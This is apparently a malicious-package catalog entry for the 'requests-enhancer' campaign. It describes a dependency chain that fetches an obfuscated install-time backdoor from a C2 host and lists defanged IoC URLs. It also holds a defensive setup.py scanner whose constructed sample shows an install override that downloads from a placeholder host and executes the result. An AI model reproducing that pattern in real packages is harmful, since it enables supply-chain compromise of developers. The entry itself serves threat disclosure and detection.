MALICIOUS (1) campaign cataloged at 2026-06-20 (2).
- (1) The campaign has clearly malicious intent, like infostealers.
- (2) This is only the date the catalog entry was created. It may not reflect the date the campaign itself was created.
2026-06-requests-enhancer
Malicious package with a chain of multiple manually fetched dependencies that finally downloads malicious code. During import, it downloads a dependency from the GitHub repository "Hexa-devy/netflow-utils", which in turn attempts to download "codexio-boop/platform_syslib". The latter contains obfuscated code that, during installation, connects to node22.lunes[.]host:3258 and downloads an encrypted payload. The payload is executed and then starts another loop of connections to node22.lunes[.]host:22240, awaiting further payloads to execute. During analysis, this stage did not deliver any payload. At every stage, short-lived generated tokens are used.
Abuse categories
backdoor
Campaign uses backdoor.
obfuscation
Code uses obfuscation techniques to hide its true purpose.
override_install
The package overrides the install command in setup.py to execute malicious code during installation.
remote_commands
The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.
through_dependency
The malicious code is intentionally included in a dependency of the package.
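A defender-side static check for the override_install pattern described above, as an added example (not code from the cataloged package or from any of the referenced repositories): it parses a setup.py with Python's ast module and reports install-command overrides whose body fetches remote content or spawns processes. The SUSPICIOUS_CALLS list and both setup.py samples are constructed for illustration.

```python
import ast

# Call names that have no business inside an install step: fetching remote
# content or spawning processes (hypothetical list, tune for your environment).
SUSPICIOUS_CALLS = {"urlopen", "urlretrieve", "Popen", "call",
                    "check_output", "system", "exec", "eval"}

def _callee_name(call):
    """Return the simple name of a call target: foo() -> 'foo', a.b() -> 'b'."""
    f = call.func
    return f.id if isinstance(f, ast.Name) else getattr(f, "attr", "")

def install_override_findings(source):
    """Parse setup.py source and return [(class_name, [suspicious calls])] for
    every class registered as cmdclass['install'] that subclasses setuptools'
    install and calls something in SUSPICIOUS_CALLS. [] means no finding."""
    tree = ast.parse(source)
    overriding = {}  # class name -> sorted suspicious calls found in its body
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            bases = {b.id if isinstance(b, ast.Name) else getattr(b, "attr", "")
                     for b in node.bases}
            if "install" in bases:
                calls = {_callee_name(c) for c in ast.walk(node)
                         if isinstance(c, ast.Call)}
                overriding[node.name] = sorted(calls & SUSPICIOUS_CALLS)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _callee_name(node) == "setup":
            for kw in node.keywords:
                if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                    for key, val in zip(kw.value.keys, kw.value.values):
                        if (isinstance(key, ast.Constant) and key.value == "install"
                                and isinstance(val, ast.Name) and overriding.get(val.id)):
                            findings.append((val.id, overriding[val.id]))
    return findings

# Constructed sample mimicking the override_install pattern (not the real package).
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import urllib.request, subprocess
class PostInstall(install):
    def run(self):
        install.run(self)
        urllib.request.urlretrieve("https://example.invalid/p.zip", "/tmp/p.zip")
        subprocess.call(["python", "/tmp/p.py"])
setup(name="demo", cmdclass={"install": PostInstall})
'''
BENIGN_SETUP_PY = "from setuptools import setup\nsetup(name='demo')\n"
```

Run it over setup.py files pulled from a package index mirror or a CI artifact store; a non-empty result is a triage lead, not proof of malice, since legitimate post-install hooks also exist.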
References
Referenced resources may include blog posts about the campaign, malware analysis, sandbox reports, or other relevant information.
IoCs & related URLs
URLs with payloads, characteristic domains, C&C IPs, repositories with malicious code, etc.
- hxxps://github.com/codexio-boop/platform_syslib/archive/refs/heads/master.zip
- hxxps://github.com/Hexa-devy/netflow-utils/archive/refs/heads/master.zip
- hxxp://node22.lunes.host:3258/sync?v=
- hxxp://node22.lunes.host:3258/go?n=
- hxxp://node22.lunes.host:22240/update?v=